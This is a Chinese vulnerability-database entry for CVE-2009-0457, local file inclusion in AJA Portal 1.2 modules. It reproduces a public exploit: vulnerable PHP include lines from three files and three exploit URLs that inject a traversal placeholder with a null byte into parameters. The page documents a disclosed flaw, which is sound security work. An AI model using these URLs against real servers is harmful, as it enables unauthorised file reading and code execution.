Magtrb AJA Portal Contact_Plus&Reviews modules 'Reviews modules'和本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117328 漏洞类型 路径遍历
发布时间 2009-02-02 更新时间 2009-02-12
CVE编号 CVE-2009-0457 CNNVD-ID CNNVD-200902-224
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7939
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-224
|漏洞详情
AJAPortal是一款针对论坛网站的内容管理系统(CMS)。AJAPortal1.2版本中存在多个目录遍历漏洞。远程攻击者借助对(1)Contact_Plus和(2)Reviewsmodules中的Reviewsmodules的currentlang参数和对Fancy_NewsLetter模块中的admin/includes/FANCYNLOptions.php的模块名参数中的目录遍历序列,包含和运行任意的本地文件。
|漏洞EXP
-------------:multi local file include:------------
---------------
script:AJA 1.2
   
------------------------------------------------------------------
download from:http://www.magtrb.com/en/modules.php?name=Downloads&op=getit&lid=6
   
------------------------------------------------------------------

........................................................
vul1: \modules\Contact_Plus\admin\case.php line 14:

if (!stristr($_SERVER['SCRIPT_NAME'], "".$admin_file.".php")) { die ("Access Denied"); }
$module_name = "Contact_Plus";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14

...............

vul2: /modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php line 2:

require_once('modules/'.$module_name.'/admin/includes/Modules/Banners.php'); line2
...............

vul3: /modules/Reviews/admin/case.php line 14:

if (!eregi("".$admin_file.".php", $_SERVER['SCRIPT_NAME'])) { die ("Access Denied"); }
$module_name = "Reviews";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14

-----------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/path/modules/Contact_Plus/admin/case.php?currentlang=[Lfi]%00

http://127.0.0.1/path/modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php?module_name=[Lfi]%00

http://127.0.0.1/path/modules/Reviews/admin/case.php?currentlang=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran-tehran]
---------------------------------------------------


# milw0rm.com [2009-02-02]
|参考资料

来源:BID
名称:33565
链接:http://www.securityfocus.com/bid/33565
来源:MILW0RM
名称:7939
链接:http://www.milw0rm.com/exploits/7939
来源:SECUNIA
名称:33735
链接:http://secunia.com/advisories/33735
来源:OSVDB
名称:51709
链接:http://osvdb.org/51709
来源:OSVDB
名称:51708
链接:http://osvdb.org/51708